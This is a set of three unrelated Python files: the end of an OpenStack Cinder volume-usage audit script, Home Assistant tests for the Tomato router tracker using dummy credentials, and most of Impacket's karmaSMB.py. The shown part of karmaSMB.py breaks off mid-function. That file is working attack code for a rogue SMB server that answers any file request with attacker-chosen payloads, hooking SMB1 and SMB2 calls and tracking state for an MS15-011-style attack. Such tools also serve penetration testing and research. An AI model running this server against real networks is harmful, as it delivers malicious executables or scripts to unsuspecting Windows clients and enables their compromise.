end = datetime.datetime.strptime(CONF.end_time,
"%Y-%m-%d %H:%M:%S")
if not end > begin:
msg = _("The end time (%(end)s) must be after the start "
"time (%(start)s).") % {'start': begin,
'end': end}
LOG.error(msg)
sys.exit(-1)
LOG.debug("Starting volume usage audit")
msg = _("Creating usages for %(begin_period)s until %(end_period)s")
LOG.debug(msg, {"begin_period": str(begin), "end_period": str(end)})
extra_info = {
'audit_period_beginning': str(begin),
'audit_period_ending': str(end),
}
volumes = db.volume_get_active_by_window(admin_context,
begin,
end)
LOG.debug("Found %d volumes"), len(volumes)
for volume_ref in volumes:
try:
LOG.debug("Send exists notification for <volume_id: "
"%(volume_id)s> <project_id %(project_id)s> "
"<%(extra_info)s>",
{'volume_id': volume_ref.id,
'project_id': volume_ref.project_id,
'extra_info': extra_info})
cinder.volume.utils.notify_about_volume_usage(
admin_context,
volume_ref,
'exists', extra_usage_info=extra_info)
except Exception as exc_msg:
LOG.exception(_LE("Exists volume notification failed: %s"),
exc_msg, resource=volume_ref)
if (CONF.send_actions and
volume_ref.created_at > begin and
volume_ref.created_at < end):
try:
local_extra_info = {
'audit_period_beginning': str(volume_ref.created_at),
'audit_period_ending': str(volume_ref.created_at),
}
LOG.debug("Send create notification for "
"<volume_id: %(volume_id)s> "
"<project_id %(project_id)s> <%(extra_info)s>",
{'volume_id': volume_ref.id,
'project_id': volume_ref.project_id,
'extra_info': local_extra_info})
cinder.volume.utils.notify_about_volume_usage(
admin_context,
volume_ref,
'create.start', extra_usage_info=local_extra_info)
cinder.volume.utils.notify_about_volume_usage(
admin_context,
volume_ref,
'create.end', extra_usage_info=local_extra_info)
except Exception as exc_msg:
LOG.exception(_LE("Create volume notification failed: %s"),
exc_msg, resource=volume_ref)
if (CONF.send_actions and volume_ref.deleted_at and
volume_ref.deleted_at > begin and
volume_ref.deleted_at < end):
try:
local_extra_info = {
'audit_period_beginning': str(volume_ref.deleted_at),
'audit_period_ending': str(volume_ref.deleted_at),
}
LOG.debug("Send delete notification for "
"<volume_id: %(volume_id)s> "
"<project_id %(project_id)s> <%(extra_info)s>",
{'volume_id': volume_ref.id,
'project_id': volume_ref.project_id,
'extra_info': local_extra_info})
cinder.volume.utils.notify_about_volume_usage(
admin_context,
volume_ref,
'delete.start', extra_usage_info=local_extra_info)
cinder.volume.utils.notify_about_volume_usage(
admin_context,
volume_ref,
'delete.end', extra_usage_info=local_extra_info)
except Exception as exc_msg:
LOG.exception(_LE("Delete volume notification failed: %s"),
exc_msg, resource=volume_ref)
snapshots = objects.SnapshotList.get_active_by_window(admin_context,
begin, end)
LOG.debug("Found %d snapshots"), len(snapshots)
for snapshot_ref in snapshots:
try:
LOG.debug("Send notification for <snapshot_id: %(snapshot_id)s> "
"<project_id %(project_id)s> <%(extra_info)s>",
{'snapshot_id': snapshot_ref.id,
'project_id': snapshot_ref.project_id,
'extra_info': extra_info})
cinder.volume.utils.notify_about_snapshot_usage(admin_context,
snapshot_ref,
'exists',
extra_info)
except Exception as exc_msg:
LOG.exception(_LE("Exists snapshot notification failed: %s"),
exc_msg, resource=snapshot_ref)
if (CONF.send_actions and
snapshot_ref.created_at > begin and
snapshot_ref.created_at < end):
try:
local_extra_info = {
'audit_period_beginning': str(snapshot_ref.created_at),
'audit_period_ending': str(snapshot_ref.created_at),
}
LOG.debug("Send create notification for "
"<snapshot_id: %(snapshot_id)s> "
"<project_id %(project_id)s> <%(extra_info)s>",
{'snapshot_id': snapshot_ref.id,
'project_id': snapshot_ref.project_id,
'extra_info': local_extra_info})
cinder.volume.utils.notify_about_snapshot_usage(
admin_context,
snapshot_ref,
'create.start', extra_usage_info=local_extra_info)
cinder.volume.utils.notify_about_snapshot_usage(
admin_context,
snapshot_ref,
'create.end', extra_usage_info=local_extra_info)
except Exception as exc_msg:
LOG.exception(_LE("Create snapshot notification failed: %s"),
exc_msg, resource=snapshot_ref)
if (CONF.send_actions and snapshot_ref.deleted_at and
snapshot_ref.deleted_at > begin and
snapshot_ref.deleted_at < end):
try:
local_extra_info = {
'audit_period_beginning': str(snapshot_ref.deleted_at),
'audit_period_ending': str(snapshot_ref.deleted_at),
}
LOG.debug("Send delete notification for "
"<snapshot_id: %(snapshot_id)s> "
"<project_id %(project_id)s> <%(extra_info)s>",
{'snapshot_id': snapshot_ref.id,
'project_id': snapshot_ref.project_id,
'extra_info': local_extra_info})
cinder.volume.utils.notify_about_snapshot_usage(
admin_context,
snapshot_ref,
'delete.start', extra_usage_info=local_extra_info)
cinder.volume.utils.notify_about_snapshot_usage(
admin_context,
snapshot_ref,
'delete.end', extra_usage_info=local_extra_info)
except Exception as exc_msg:
LOG.exception(_LE("Delete snapshot notification failed: %s"),
exc_msg, resource=snapshot_ref)
LOG.debug("Volume usage audit completed")
|
|
"""The tests for the Tomato device tracker platform."""
from unittest import mock
import pytest
import requests
import requests_mock
import voluptuous as vol
from homeassistant.components.device_tracker import DOMAIN, tomato as tomato
from homeassistant.const import (CONF_HOST, CONF_USERNAME, CONF_PASSWORD,
CONF_PORT, CONF_SSL, CONF_PLATFORM,
CONF_VERIFY_SSL)
def mock_session_response(*args, **kwargs):
"""Mock data generation for session response."""
class MockSessionResponse:
def __init__(self, text, status_code):
self.text = text
self.status_code = status_code
# Username: foo
# Password: bar
if args[0].headers['Authorization'] != 'Basic Zm9vOmJhcg==':
return MockSessionResponse(None, 401)
if "gimmie_bad_data" in args[0].body:
return MockSessionResponse('This shouldn\'t (wldev = be here.;', 200)
if "gimmie_good_data" in args[0].body:
return MockSessionResponse(
"wldev = [ ['eth1','F4:F5:D8:AA:AA:AA',"
"-42,5500,1000,7043,0],['eth1','58:EF:68:00:00:00',"
"-42,5500,1000,7043,0]];\n"
"dhcpd_lease = [ ['chromecast','172.10.10.5','F4:F5:D8:AA:AA:AA',"
"'0 days, 16:17:08'],['wemo','172.10.10.6','58:EF:68:00:00:00',"
"'0 days, 12:09:08']];", 200)
return MockSessionResponse(None, 200)
@pytest.fixture
def mock_exception_logger():
"""Mock pyunifi."""
with mock.patch('homeassistant.components.device_tracker'
'.tomato._LOGGER.exception') as mock_exception_logger:
yield mock_exception_logger
@pytest.fixture
def mock_session_send():
"""Mock requests.Session().send."""
with mock.patch('requests.Session.send') as mock_session_send:
yield mock_session_send
def test_config_missing_optional_params(hass, mock_session_send):
"""Test the setup without optional parameters."""
config = {
DOMAIN: tomato.PLATFORM_SCHEMA({
CONF_PLATFORM: tomato.DOMAIN,
CONF_HOST: 'tomato-router',
CONF_USERNAME: 'foo',
CONF_PASSWORD: 'password',
tomato.CONF_HTTP_ID: '1234567890'
})
}
result = tomato.get_scanner(hass, config)
assert result.req.url == "http://tomato-router:80/update.cgi"
assert result.req.headers == {
'Content-Length': '32',
'Content-Type': 'application/x-www-form-urlencoded',
'Authorization': 'Basic Zm9vOnBhc3N3b3Jk'
}
assert "_http_id=1234567890" in result.req.body
assert "exec=devlist" in result.req.body
@mock.patch('os.access', return_value=True)
@mock.patch('os.path.isfile', mock.Mock(return_value=True))
def test_config_default_nonssl_port(hass, mock_session_send):
"""Test the setup without a default port set without ssl enabled."""
config = {
DOMAIN: tomato.PLATFORM_SCHEMA({
CONF_PLATFORM: tomato.DOMAIN,
CONF_HOST: 'tomato-router',
CONF_USERNAME: 'foo',
CONF_PASSWORD: 'password',
tomato.CONF_HTTP_ID: '1234567890'
})
}
result = tomato.get_scanner(hass, config)
assert result.req.url == "http://tomato-router:80/update.cgi"
@mock.patch('os.access', return_value=True)
@mock.patch('os.path.isfile', mock.Mock(return_value=True))
def test_config_default_ssl_port(hass, mock_session_send):
"""Test the setup without a default port set with ssl enabled."""
config = {
DOMAIN: tomato.PLATFORM_SCHEMA({
CONF_PLATFORM: tomato.DOMAIN,
CONF_HOST: 'tomato-router',
CONF_SSL: True,
CONF_USERNAME: 'foo',
CONF_PASSWORD: 'password',
tomato.CONF_HTTP_ID: '1234567890'
})
}
result = tomato.get_scanner(hass, config)
assert result.req.url == "https://tomato-router:443/update.cgi"
@mock.patch('os.access', return_value=True)
@mock.patch('os.path.isfile', mock.Mock(return_value=True))
def test_config_verify_ssl_but_no_ssl_enabled(hass, mock_session_send):
"""Test the setup with a string with ssl_verify but ssl not enabled."""
config = {
DOMAIN: tomato.PLATFORM_SCHEMA({
CONF_PLATFORM: tomato.DOMAIN,
CONF_HOST: 'tomato-router',
CONF_PORT: 1234,
CONF_SSL: False,
CONF_VERIFY_SSL: "/tmp/tomato.crt",
CONF_USERNAME: 'foo',
CONF_PASSWORD: 'password',
tomato.CONF_HTTP_ID: '1234567890'
})
}
result = tomato.get_scanner(hass, config)
assert result.req.url == "http://tomato-router:1234/update.cgi"
assert result.req.headers == {
'Content-Length': '32',
'Content-Type': 'application/x-www-form-urlencoded',
'Authorization': 'Basic Zm9vOnBhc3N3b3Jk'
}
assert "_http_id=1234567890" in result.req.body
assert "exec=devlist" in result.req.body
assert mock_session_send.call_count == 1
assert mock_session_send.mock_calls[0] == \
mock.call(result.req, timeout=3)
@mock.patch('os.access', return_value=True)
@mock.patch('os.path.isfile', mock.Mock(return_value=True))
def test_config_valid_verify_ssl_path(hass, mock_session_send):
"""Test the setup with a string for ssl_verify.
Representing the absolute path to a CA certificate bundle.
"""
config = {
DOMAIN: tomato.PLATFORM_SCHEMA({
CONF_PLATFORM: tomato.DOMAIN,
CONF_HOST: 'tomato-router',
CONF_PORT: 1234,
CONF_SSL: True,
CONF_VERIFY_SSL: "/tmp/tomato.crt",
CONF_USERNAME: 'bar',
CONF_PASSWORD: 'foo',
tomato.CONF_HTTP_ID: '0987654321'
})
}
result = tomato.get_scanner(hass, config)
assert result.req.url == "https://tomato-router:1234/update.cgi"
assert result.req.headers == {
'Content-Length': '32',
'Content-Type': 'application/x-www-form-urlencoded',
'Authorization': 'Basic YmFyOmZvbw=='
}
assert "_http_id=0987654321" in result.req.body
assert "exec=devlist" in result.req.body
assert mock_session_send.call_count == 1
assert mock_session_send.mock_calls[0] == \
mock.call(result.req, timeout=3, verify="/tmp/tomato.crt")
def test_config_valid_verify_ssl_bool(hass, mock_session_send):
"""Test the setup with a bool for ssl_verify."""
config = {
DOMAIN: tomato.PLATFORM_SCHEMA({
CONF_PLATFORM: tomato.DOMAIN,
CONF_HOST: 'tomato-router',
CONF_PORT: 1234,
CONF_SSL: True,
CONF_VERIFY_SSL: "False",
CONF_USERNAME: 'bar',
CONF_PASSWORD: 'foo',
tomato.CONF_HTTP_ID: '0987654321'
})
}
result = tomato.get_scanner(hass, config)
assert result.req.url == "https://tomato-router:1234/update.cgi"
assert result.req.headers == {
'Content-Length': '32',
'Content-Type': 'application/x-www-form-urlencoded',
'Authorization': 'Basic YmFyOmZvbw=='
}
assert "_http_id=0987654321" in result.req.body
assert "exec=devlist" in result.req.body
assert mock_session_send.call_count == 1
assert mock_session_send.mock_calls[0] == \
mock.call(result.req, timeout=3, verify=False)
def test_config_errors():
"""Test for configuration errors."""
with pytest.raises(vol.Invalid):
tomato.PLATFORM_SCHEMA({
CONF_PLATFORM: tomato.DOMAIN,
# No Host,
CONF_PORT: 1234,
CONF_SSL: True,
CONF_VERIFY_SSL: "False",
CONF_USERNAME: 'bar',
CONF_PASSWORD: 'foo',
tomato.CONF_HTTP_ID: '0987654321'
})
with pytest.raises(vol.Invalid):
tomato.PLATFORM_SCHEMA({
CONF_PLATFORM: tomato.DOMAIN,
CONF_HOST: 'tomato-router',
CONF_PORT: -123456789, # Bad Port
CONF_SSL: True,
CONF_VERIFY_SSL: "False",
CONF_USERNAME: 'bar',
CONF_PASSWORD: 'foo',
tomato.CONF_HTTP_ID: '0987654321'
})
with pytest.raises(vol.Invalid):
tomato.PLATFORM_SCHEMA({
CONF_PLATFORM: tomato.DOMAIN,
CONF_HOST: 'tomato-router',
CONF_PORT: 1234,
CONF_SSL: True,
CONF_VERIFY_SSL: "False",
# No Username
CONF_PASSWORD: 'foo',
tomato.CONF_HTTP_ID: '0987654321'
})
with pytest.raises(vol.Invalid):
tomato.PLATFORM_SCHEMA({
CONF_PLATFORM: tomato.DOMAIN,
CONF_HOST: 'tomato-router',
CONF_PORT: 1234,
CONF_SSL: True,
CONF_VERIFY_SSL: "False",
CONF_USERNAME: 'bar',
# No Password
tomato.CONF_HTTP_ID: '0987654321'
})
with pytest.raises(vol.Invalid):
tomato.PLATFORM_SCHEMA({
CONF_PLATFORM: tomato.DOMAIN,
CONF_HOST: 'tomato-router',
CONF_PORT: 1234,
CONF_SSL: True,
CONF_VERIFY_SSL: "False",
CONF_USERNAME: 'bar',
CONF_PASSWORD: 'foo',
# No HTTP_ID
})
@mock.patch('requests.Session.send', side_effect=mock_session_response)
def test_config_bad_credentials(hass, mock_exception_logger):
"""Test the setup with bad credentials."""
config = {
DOMAIN: tomato.PLATFORM_SCHEMA({
CONF_PLATFORM: tomato.DOMAIN,
CONF_HOST: 'tomato-router',
CONF_USERNAME: 'i_am',
CONF_PASSWORD: 'an_imposter',
tomato.CONF_HTTP_ID: '1234'
})
}
tomato.get_scanner(hass, config)
assert mock_exception_logger.call_count == 1
assert mock_exception_logger.mock_calls[0] == \
mock.call("Failed to authenticate, "
"please check your username and password")
@mock.patch('requests.Session.send', side_effect=mock_session_response)
def test_bad_response(hass, mock_exception_logger):
"""Test the setup with bad response from router."""
config = {
DOMAIN: tomato.PLATFORM_SCHEMA({
CONF_PLATFORM: tomato.DOMAIN,
CONF_HOST: 'tomato-router',
CONF_USERNAME: 'foo',
CONF_PASSWORD: 'bar',
tomato.CONF_HTTP_ID: 'gimmie_bad_data'
})
}
tomato.get_scanner(hass, config)
assert mock_exception_logger.call_count == 1
assert mock_exception_logger.mock_calls[0] == \
mock.call("Failed to parse response from router")
@mock.patch('requests.Session.send', side_effect=mock_session_response)
def test_scan_devices(hass, mock_exception_logger):
"""Test scanning for new devices."""
config = {
DOMAIN: tomato.PLATFORM_SCHEMA({
CONF_PLATFORM: tomato.DOMAIN,
CONF_HOST: 'tomato-router',
CONF_USERNAME: 'foo',
CONF_PASSWORD: 'bar',
tomato.CONF_HTTP_ID: 'gimmie_good_data'
})
}
scanner = tomato.get_scanner(hass, config)
assert scanner.scan_devices() == ['F4:F5:D8:AA:AA:AA', '58:EF:68:00:00:00']
@mock.patch('requests.Session.send', side_effect=mock_session_response)
def test_bad_connection(hass, mock_exception_logger):
"""Test the router with a connection error."""
config = {
DOMAIN: tomato.PLATFORM_SCHEMA({
CONF_PLATFORM: tomato.DOMAIN,
CONF_HOST: 'tomato-router',
CONF_USERNAME: 'foo',
CONF_PASSWORD: 'bar',
tomato.CONF_HTTP_ID: 'gimmie_good_data'
})
}
with requests_mock.Mocker() as adapter:
adapter.register_uri('POST', 'http://tomato-router:80/update.cgi',
exc=requests.exceptions.ConnectionError),
tomato.get_scanner(hass, config)
assert mock_exception_logger.call_count == 1
assert mock_exception_logger.mock_calls[0] == \
mock.call("Failed to connect to the router "
"or invalid http_id supplied")
@mock.patch('requests.Session.send', side_effect=mock_session_response)
def test_router_timeout(hass, mock_exception_logger):
"""Test the router with a timeout error."""
config = {
DOMAIN: tomato.PLATFORM_SCHEMA({
CONF_PLATFORM: tomato.DOMAIN,
CONF_HOST: 'tomato-router',
CONF_USERNAME: 'foo',
CONF_PASSWORD: 'bar',
tomato.CONF_HTTP_ID: 'gimmie_good_data'
})
}
with requests_mock.Mocker() as adapter:
adapter.register_uri('POST', 'http://tomato-router:80/update.cgi',
exc=requests.exceptions.Timeout),
tomato.get_scanner(hass, config)
assert mock_exception_logger.call_count == 1
assert mock_exception_logger.mock_calls[0] == \
mock.call("Connection to the router timed out")
@mock.patch('requests.Session.send', side_effect=mock_session_response)
def test_get_device_name(hass, mock_exception_logger):
"""Test getting device names."""
config = {
DOMAIN: tomato.PLATFORM_SCHEMA({
CONF_PLATFORM: tomato.DOMAIN,
CONF_HOST: 'tomato-router',
CONF_USERNAME: 'foo',
CONF_PASSWORD: 'bar',
tomato.CONF_HTTP_ID: 'gimmie_good_data'
})
}
scanner = tomato.get_scanner(hass, config)
assert scanner.get_device_name('F4:F5:D8:AA:AA:AA') == 'chromecast'
assert scanner.get_device_name('58:EF:68:00:00:00') == 'wemo'
assert scanner.get_device_name('AA:BB:CC:00:00:00') is None
|
|
#!/usr/bin/env python
# Copyright (c) 2016 CORE Security Technologies
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Karma SMB
#
# Author:
# Alberto Solino (@agsolino)
# Original idea by @mubix
#
# Description:
# The idea of this script is to answer any file read request
# with a set of predefined contents based on the extension
# asked, regardless of the sharename and/or path.
# When executing this script w/o a config file the pathname
# file contents will be sent for every request.
# If a config file is specified, format should be this way:
# <extension> = <pathname>
# for example:
# bat = /tmp/batchfile
# com = /tmp/comfile
# exe = /tmp/exefile
#
# The SMB2 support works with a caveat. If two different
# filenames at the same share are requested, the first
# one will work and the second one will not work if the request
# is performed right away. This seems related to the
# QUERY_DIRECTORY request, where we return the files available.
# In the first try, we return the file that was asked to open.
# In the second try, the client will NOT ask for another
# QUERY_DIRECTORY but will use the cached one. This time the new file
# is not there, so the client assumes it doesn't exist.
# After a few seconds, looks like the client cache is cleared and
# the operation works again. Further research is needed trying
# to avoid this from happening.
#
# SMB1 seems to be working fine on that scenario.
#
# ToDo:
# [ ] A lot of testing needed under different OSes.
# I'm still not sure how reliable this approach is.
# [ ] Add support for other SMB read commands. Right now just
# covering SMB_COM_NT_CREATE_ANDX
# [ ] Disable write request, now if the client tries to copy
# a file back to us, it will overwrite the files we're
# hosting. *CAREFUL!!!*
#
import sys
import os
import argparse
import logging
import ntpath
import ConfigParser
from threading import Thread
from impacket.examples import logger
from impacket import smbserver, smb, version
import impacket.smb3structs as smb2
from impacket.smb import FILE_OVERWRITE, FILE_OVERWRITE_IF, FILE_WRITE_DATA, FILE_APPEND_DATA, GENERIC_WRITE
from impacket.nt_errors import STATUS_USER_SESSION_DELETED, STATUS_SUCCESS, STATUS_ACCESS_DENIED, STATUS_NO_MORE_FILES, \
STATUS_OBJECT_PATH_NOT_FOUND
from impacket.smbserver import SRVSServer, decodeSMBString, findFirst2, STATUS_SMB_BAD_TID, encodeSMBString, \
getFileTime, queryPathInformation
class KarmaSMBServer(Thread):
def __init__(self, smb2Support = False):
Thread.__init__(self)
self.server = 0
self.defaultFile = None
self.extensions = {}
# Here we write a mini config for the server
smbConfig = ConfigParser.ConfigParser()
smbConfig.add_section('global')
smbConfig.set('global','server_name','server_name')
smbConfig.set('global','server_os','UNIX')
smbConfig.set('global','server_domain','WORKGROUP')
smbConfig.set('global','log_file','smb.log')
smbConfig.set('global','credentials_file','')
# IPC always needed
smbConfig.add_section('IPC$')
smbConfig.set('IPC$','comment','Logon server share')
smbConfig.set('IPC$','read only','yes')
smbConfig.set('IPC$','share type','3')
smbConfig.set('IPC$','path','')
# NETLOGON always needed
smbConfig.add_section('NETLOGON')
smbConfig.set('NETLOGON','comment','Logon server share')
smbConfig.set('NETLOGON','read only','no')
smbConfig.set('NETLOGON','share type','0')
smbConfig.set('NETLOGON','path','')
# SYSVOL always needed
smbConfig.add_section('SYSVOL')
smbConfig.set('SYSVOL','comment','')
smbConfig.set('SYSVOL','read only','no')
smbConfig.set('SYSVOL','share type','0')
smbConfig.set('SYSVOL','path','')
if smb2Support:
smbConfig.set("global", "SMB2Support", "True")
self.server = smbserver.SMBSERVER(('0.0.0.0',445), config_parser = smbConfig)
self.server.processConfigFile()
# Unregistering some dangerous and unwanted commands
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_CREATE_DIRECTORY)
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_DELETE_DIRECTORY)
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_RENAME)
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_DELETE)
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_WRITE)
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_WRITE_ANDX)
self.server.unregisterSmb2Command(smb2.SMB2_WRITE)
self.origsmbComNtCreateAndX = self.server.hookSmbCommand(smb.SMB.SMB_COM_NT_CREATE_ANDX, self.smbComNtCreateAndX)
self.origsmbComTreeConnectAndX = self.server.hookSmbCommand(smb.SMB.SMB_COM_TREE_CONNECT_ANDX, self.smbComTreeConnectAndX)
self.origQueryPathInformation = self.server.hookTransaction2(smb.SMB.TRANS2_QUERY_PATH_INFORMATION, self.queryPathInformation)
self.origFindFirst2 = self.server.hookTransaction2(smb.SMB.TRANS2_FIND_FIRST2, self.findFirst2)
# And the same for SMB2
self.origsmb2TreeConnect = self.server.hookSmb2Command(smb2.SMB2_TREE_CONNECT, self.smb2TreeConnect)
self.origsmb2Create = self.server.hookSmb2Command(smb2.SMB2_CREATE, self.smb2Create)
self.origsmb2QueryDirectory = self.server.hookSmb2Command(smb2.SMB2_QUERY_DIRECTORY, self.smb2QueryDirectory)
self.origsmb2Read = self.server.hookSmb2Command(smb2.SMB2_READ, self.smb2Read)
self.origsmb2Close = self.server.hookSmb2Command(smb2.SMB2_CLOSE, self.smb2Close)
# Now we have to register the MS-SRVS server. This specially important for
# Windows 7+ and Mavericks clients since they WONT (specially OSX)
# ask for shares using MS-RAP.
self.__srvsServer = SRVSServer()
self.__srvsServer.daemon = True
self.server.registerNamedPipe('srvsvc',('127.0.0.1',self.__srvsServer.getListenPort()))
def findFirst2(self, connId, smbServer, recvPacket, parameters, data, maxDataCount):
connData = smbServer.getConnectionData(connId)
respSetup = ''
respParameters = ''
respData = ''
findFirst2Parameters = smb.SMBFindFirst2_Parameters( recvPacket['Flags2'], data = parameters)
# 1. Let's grab the extension and map the file's contents we will deliver
origPathName = os.path.normpath(decodeSMBString(recvPacket['Flags2'],findFirst2Parameters['FileName']).replace('\\','/'))
origFileName = os.path.basename(origPathName)
_, origPathNameExtension = os.path.splitext(origPathName)
origPathNameExtension = origPathNameExtension.upper()[1:]
if self.extensions.has_key(origPathNameExtension.upper()):
targetFile = self.extensions[origPathNameExtension.upper()]
else:
targetFile = self.defaultFile
if connData['ConnectedShares'].has_key(recvPacket['Tid']):
path = connData['ConnectedShares'][recvPacket['Tid']]['path']
# 2. We call the normal findFirst2 call, but with our targetFile
searchResult, searchCount, errorCode = findFirst2(path,
targetFile,
findFirst2Parameters['InformationLevel'],
findFirst2Parameters['SearchAttributes'] )
respParameters = smb.SMBFindFirst2Response_Parameters()
endOfSearch = 1
sid = 0x80 # default SID
searchCount = 0
totalData = 0
for i in enumerate(searchResult):
#i[1].dump()
try:
# 3. And we restore the original filename requested ;)
i[1]['FileName'] = encodeSMBString( flags = recvPacket['Flags2'], text = origFileName)
except:
pass
data = i[1].getData()
lenData = len(data)
if (totalData+lenData) >= maxDataCount or (i[0]+1) > findFirst2Parameters['SearchCount']:
# We gotta stop here and continue on a find_next2
endOfSearch = 0
# Simple way to generate a fid
if len(connData['SIDs']) == 0:
sid = 1
else:
sid = connData['SIDs'].keys()[-1] + 1
# Store the remaining search results in the ConnData SID
connData['SIDs'][sid] = searchResult[i[0]:]
respParameters['LastNameOffset'] = totalData
break
else:
searchCount +=1
respData += data
totalData += lenData
respParameters['SID'] = sid
respParameters['EndOfSearch'] = endOfSearch
respParameters['SearchCount'] = searchCount
else:
errorCode = STATUS_SMB_BAD_TID
smbServer.setConnectionData(connId, connData)
return respSetup, respParameters, respData, errorCode
def smbComNtCreateAndX(self, connId, smbServer, SMBCommand, recvPacket):
connData = smbServer.getConnectionData(connId)
ntCreateAndXParameters = smb.SMBNtCreateAndX_Parameters(SMBCommand['Parameters'])
ntCreateAndXData = smb.SMBNtCreateAndX_Data( flags = recvPacket['Flags2'], data = SMBCommand['Data'])
respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_NT_CREATE_ANDX)
#ntCreateAndXParameters.dump()
# Let's try to avoid allowing write requests from the client back to us
# not 100% bulletproof, plus also the client might be using other SMB
# calls (e.g. SMB_COM_WRITE)
createOptions = ntCreateAndXParameters['CreateOptions']
if createOptions & smb.FILE_DELETE_ON_CLOSE == smb.FILE_DELETE_ON_CLOSE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['Disposition'] & smb.FILE_OVERWRITE == FILE_OVERWRITE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['Disposition'] & smb.FILE_OVERWRITE_IF == FILE_OVERWRITE_IF:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['AccessMask'] & smb.FILE_WRITE_DATA == FILE_WRITE_DATA:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['AccessMask'] & smb.FILE_APPEND_DATA == FILE_APPEND_DATA:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['AccessMask'] & smb.GENERIC_WRITE == GENERIC_WRITE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['AccessMask'] & 0x10000 == 0x10000:
errorCode = STATUS_ACCESS_DENIED
else:
errorCode = STATUS_SUCCESS
if errorCode == STATUS_ACCESS_DENIED:
return [respSMBCommand], None, errorCode
# 1. Let's grab the extension and map the file's contents we will deliver
origPathName = os.path.normpath(decodeSMBString(recvPacket['Flags2'],ntCreateAndXData['FileName']).replace('\\','/'))
_, origPathNameExtension = os.path.splitext(origPathName)
origPathNameExtension = origPathNameExtension.upper()[1:]
if self.extensions.has_key(origPathNameExtension.upper()):
targetFile = self.extensions[origPathNameExtension.upper()]
else:
targetFile = self.defaultFile
# 2. We change the filename in the request for our targetFile
ntCreateAndXData['FileName'] = encodeSMBString( flags = recvPacket['Flags2'], text = targetFile)
SMBCommand['Data'] = str(ntCreateAndXData)
smbServer.log("%s is asking for %s. Delivering %s" % (connData['ClientIP'], origPathName,targetFile),logging.INFO)
# 3. We call the original call with our modified data
return self.origsmbComNtCreateAndX(connId, smbServer, SMBCommand, recvPacket)
def queryPathInformation(self, connId, smbServer, recvPacket, parameters, data, maxDataCount = 0):
# The trick we play here is that Windows clients first ask for the file
# and then it asks for the directory containing the file.
# It is important to answer the right questions for the attack to work
connData = smbServer.getConnectionData(connId)
respSetup = ''
respParameters = ''
respData = ''
errorCode = 0
queryPathInfoParameters = smb.SMBQueryPathInformation_Parameters(flags = recvPacket['Flags2'], data = parameters)
if connData['ConnectedShares'].has_key(recvPacket['Tid']):
path = ''
try:
origPathName = decodeSMBString(recvPacket['Flags2'], queryPathInfoParameters['FileName'])
origPathName = os.path.normpath(origPathName.replace('\\','/'))
if connData.has_key('MS15011') is False:
connData['MS15011'] = {}
smbServer.log("Client is asking for QueryPathInformation for: %s" % origPathName,logging.INFO)
if connData['MS15011'].has_key(origPathName) or origPathName == '.':
# We already processed this entry, now it's asking for a directory
infoRecord, errorCode = queryPathInformation(path, '/', queryPathInfoParameters['InformationLevel'])
else:
# First time asked, asking for the file
infoRecord, errorCode = queryPathInformation(path, self.defaultFile, queryPathInfoParameters['InformationLevel'])
connData['MS15011'][os.path.dirname(origPathName)] = infoRecord
except Exception, e:
#import traceback
#traceback.print_exc()
smbServer.log("queryPathInformation: %s" % e,logging.ERROR)
if infoRecord is not None:
respParameters = smb.SMBQueryPathInformationResponse_Parameters()
respData = infoRecord
else:
errorCode = STATUS_SMB_BAD_TID
smbServer.setConnectionData(connId, connData)
return respSetup, respParameters, respData, errorCode
def smb2Read(self, connId, smbServer, recvPacket):
connData = smbServer.getConnectionData(connId)
connData['MS15011']['StopConnection'] = True
smbServer.setConnectionData(connId, connData)
return self.origsmb2Read(connId, smbServer, recvPacket)
def smb2Close(self, connId, smbServer, recvPacket):
connData = smbServer.getConnectionData(connId)
# We're closing the connection trying to flush the client's
# cache.
if connData['MS15011']['StopConnection'] is True:
return [smb2.SMB2Error()], None, STATUS_USER_SESSION_DELETED
return self.origsmb2Close(connId, smbServer, recvPacket)
def smb2Create(self, connId, smbServer, recvPacket):
connData = smbServer.getConnectionData(connId)
ntCreateRequest = smb2.SMB2Create(recvPacket['Data'])
# Let's try to avoid allowing write requests from the client back to us
# not 100% bulletproof, plus also the client might be using other SMB
# calls
createOptions = ntCreateRequest['CreateOptions']
if createOptions & smb2.FILE_DELETE_ON_CLOSE == smb2.FILE_DELETE_ON_CLOSE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['CreateDisposition'] & smb2.FILE_OVERWRITE == smb2.FILE_OVERWRITE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['CreateDisposition'] & smb2.FILE_OVERWRITE_IF == smb2.FILE_OVERWRITE_IF:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['DesiredAccess'] & smb2.FILE_WRITE_DATA == smb2.FILE_WRITE_DATA:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['DesiredAccess'] & smb2.FILE_APPEND_DATA == smb2.FILE_APPEND_DATA:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['DesiredAccess'] & smb2.GENERIC_WRITE == smb2.GENERIC_WRITE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['DesiredAccess'] & 0x10000 == 0x10000:
errorCode = STATUS_ACCESS_DENIED
else:
errorCode = STATUS_SUCCESS
if errorCode == STATUS_ACCESS_DENIED:
return [smb2.SMB2Error()], None, errorCode
# 1. Let's grab the extension and map the file's contents we will deliver
origPathName = os.path.normpath(ntCreateRequest['Buffer'][:ntCreateRequest['NameLength']].decode('utf-16le').replace('\\','/'))
_, origPathNameExtension = os.path.splitext(origPathName)
origPathNameExtension = origPathNameExtension.upper()[1:]
# Are we being asked for a directory?
if (createOptions & smb2.FILE_DIRECTORY_FILE) == 0:
if self.extensions.has_key(origPathNameExtension.upper()):
targetFile = self.extensions[origPathNameExtension.upper()]
else:
targetFile = self.defaultFile
